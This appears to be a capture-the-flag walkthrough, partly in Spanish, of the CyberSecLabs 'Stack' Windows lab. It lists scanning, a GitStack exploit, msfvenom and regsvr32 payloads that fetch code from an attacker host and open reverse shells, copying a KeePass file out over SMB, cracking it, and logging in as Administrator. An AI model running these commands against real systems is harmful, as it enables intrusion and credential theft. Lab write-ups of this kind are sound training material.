Stack

Stack


CyberSecLabs Windows

nmap -A -p- -oA output 172.31.1.28 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -p- -sS —min-rate=5000 —open -vvv -n -Pn 172.31.1.12 -oG allPorts

ssh_command.)

extractPorts allPorts

ssh_command.

nmap -sC -sV -p80,135,139,445,3389,5985,47001,49152,49153,49154 172.31.1.12 -oN targeted

ssh_command.

nmap —script http-enum -p80 172.31.1.12 -oN webScan

ssh_command.

whatweb 172.31.1.12:80

ssh_command.

cat targeted

ssh_command.

Vamos a la pagina web y parece ser que es algo con Django

ssh_command.

Vamos a registration/login y podemos ver las credenciales:

ssh_command.

ssh_command.

searchsploit Gitstack

cat 43777.py

Vemos que hace el script

ssh_command.

curl -X POST 172.31.1.12/web/exploit.php -d ‘a=whoami’

ssh_command.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o reverse_gitstack.exe

curl -X POST 172.31.1.12/web/exploit.php -d ‘a=certutil -urlcache -split -f http://10.10.0.12:8888/reverse_gitstack.exe

python3 -m http.server 8888

nc -lvnp 4444

curl -X POST 172.31.1.12/web/exploit.php -d ‘a=reverse_stack.exe’

ssh_command.

El reverse shell no me funciono con el reverse_stack.exe se desconectaba a cada rato.

ssh_command.

msf6>use exploit/multi/script/webdelivery msf6>set LHOST tun0 msf6> set TARGET 3 msf6>set payload windows/meterpreter/reverse_tcp msf6>run

ssh_command.

curl -X POST 172.31.1.12/web/exploit.php -d ‘a=regsvr32 /s /n /u /i:http//10.10.0.12:8080/EzA1or.sct scrobj.dll’

ssh_command.

msf6>sessions -i 1 meterpreter > shell

ssh_command.

ssh_command.

python3 /usr/share/doc/python3-impacket/examples/smbserver.py smbFolder $(pwd)

ssh_command.

copy password_manager.kdbx \10.10.0.12\smbFolder

ssh_command.

keepass2john password_manager.kdbx keepass2john password_manager.kdbx > stackpass cat stackpass | cut -d ”:” -f 2 | tee stackpass john stackpass

ssh_command.

kpcli —kdb=password_manager.kdbx princess cd Database2/Windows/ show -f 0

ssh_command.

crackmapexec winrm 172.31.1.12 -u Administrator -p ‘secur3_apass262’ -x ‘whoami’

© 2025 Cu3rv0x